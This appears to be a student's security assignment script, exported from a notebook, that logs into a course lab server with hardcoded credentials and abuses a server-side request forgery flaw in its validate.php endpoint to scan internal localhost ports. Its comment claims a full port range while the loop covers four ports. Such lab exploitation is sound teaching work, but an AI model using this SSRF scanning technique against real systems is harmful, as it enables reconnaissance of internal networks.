# -*- coding: utf-8 -*-
"""WS A2.ipynb
author: Lihua Wang
SID: 1164051

Automatically generated by Colaboratory.

Original file is located at
    https://colab.research.google.com/drive/1HE940PQA-QffJIV6WWdxsaHP3t5sl-kL
"""

import requests
from urllib.parse import quote
import time

session = requests.session()

"""
Login
"""
url = "http://assignment-hermes.unimelb.life/auth.php"
credential = {"user":"lihuwang", "pass":"lihuwang"}
session.post(url, data = credential)

"""
SSRF
"""

# start port scan from port 0 to 65535
for i in range(8870, 8874):
    # to keep the 30 requests per minute
    time.sleep(2)
    print(f"Port: {i}")
    respond = session.get("http://assignment-hermes.unimelb.life/validate.php?web=" + quote(f"http://127.0.0.1:{i}"))
    # fetch respond
    print(respond.text)
